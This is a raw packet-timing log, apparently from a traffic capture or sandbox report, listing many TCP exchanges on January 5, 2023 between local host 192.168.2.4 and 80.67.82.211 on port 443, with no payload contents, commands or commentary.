                                                                                                                                                                                    Jan 5, 2023 08:58:12.815797091 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.815999985 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816082001 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816224098 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816266060 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816307068 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816322088 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816345930 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816390038 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816560984 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816606998 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816637993 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816653013 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816674948 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816703081 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.816926956 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817017078 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817074060 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817116976 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817162037 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817178965 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817199945 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817229033 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817576885 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817632914 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817656040 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817704916 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817744970 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817758083 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817780972 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817814112 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817845106 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817925930 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.817981958 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818022966 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818057060 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818070889 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818095922 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818123102 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818574905 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818619013 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818672895 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818687916 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818727016 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818769932 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818850040 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818866014 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.818918943 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819152117 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819197893 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819236040 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819251060 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819293022 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819464922 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819515944 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819530964 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819550991 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819574118 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819596052 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819623947 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819634914 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819650888 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819706917 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.819947958 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820312023 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820357084 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820419073 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820434093 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820456982 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820489883 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820641994 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820729017 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820733070 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820758104 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820806026 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820825100 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820888042 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.820971012 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821094036 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821120977 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821186066 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821206093 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821228981 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821480989 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821516037 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821564913 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821583033 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821603060 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821604013 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821640015 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821654081 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821676970 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.821707010 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822062969 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822093010 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822165012 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822179079 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822202921 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822243929 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822308064 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822371960 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822393894 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822407961 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822449923 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822468042 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822633982 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822737932 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822855949 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822886944 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822953939 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822972059 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.822993994 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823203087 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823239088 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823287010 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823301077 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823338985 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823367119 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823546886 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823640108 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823713064 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823741913 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823797941 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823815107 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.823834896 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824140072 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824172974 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824229002 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824246883 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824268103 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824310064 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824347019 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824441910 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824625969 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824657917 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824712992 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824731112 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824752092 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824793100 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824961901 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.824990034 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825051069 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825063944 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825088024 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825102091 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825181961 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825195074 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825258017 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825295925 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825330973 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825381041 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825395107 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825417042 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825858116 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825891018 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825921059 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.825992107 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826005936 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826026917 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826028109 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826112986 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826126099 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826186895 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826411963 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826438904 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826513052 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826525927 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826549053 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826550007 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826586962 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826622009 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826636076 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826659918 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.826714993 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827533960 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827641010 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827739954 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827768087 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827835083 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827850103 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827876091 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.827919006 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828336954 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828366041 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828449965 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828465939 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828466892 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828485012 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828505993 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828545094 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828635931 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828687906 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828716993 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828731060 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828754902 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.828782082 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829096079 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829128981 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829189062 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829204082 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829227924 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829240084 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829262018 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829273939 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829314947 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829349041 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829435110 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829462051 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829513073 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829526901 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829550028 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.829570055 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830065966 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830100060 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830178022 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830178976 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830194950 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830244064 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830291033 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830631018 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830650091 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830775976 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830820084 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830905914 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830952883 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.830974102 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831031084 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831037998 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831054926 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831079960 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831135035 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831371069 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831392050 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831456900 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831470013 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831490993 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831587076 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831613064 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831661940 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831681967 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831701040 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831808090 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831872940 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831887007 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.831942081 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832120895 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832140923 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832194090 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832206011 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832225084 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832384109 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832407951 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832457066 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832468987 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832492113 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832493067 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832566977 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832581043 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832631111 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832777023 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832797050 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832844973 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832858086 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.832880020 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833062887 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833086014 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833134890 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833148003 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833168983 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833220005 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833285093 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833297014 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833347082 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833497047 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833518982 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833569050 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833580017 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833601952 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833631039 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833766937 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833785057 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833836079 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833847046 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833870888 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833873987 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833895922 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833909035 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833940029 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.833957911 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834151983 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834171057 CET4434973680.67.82.211192.168.2.4
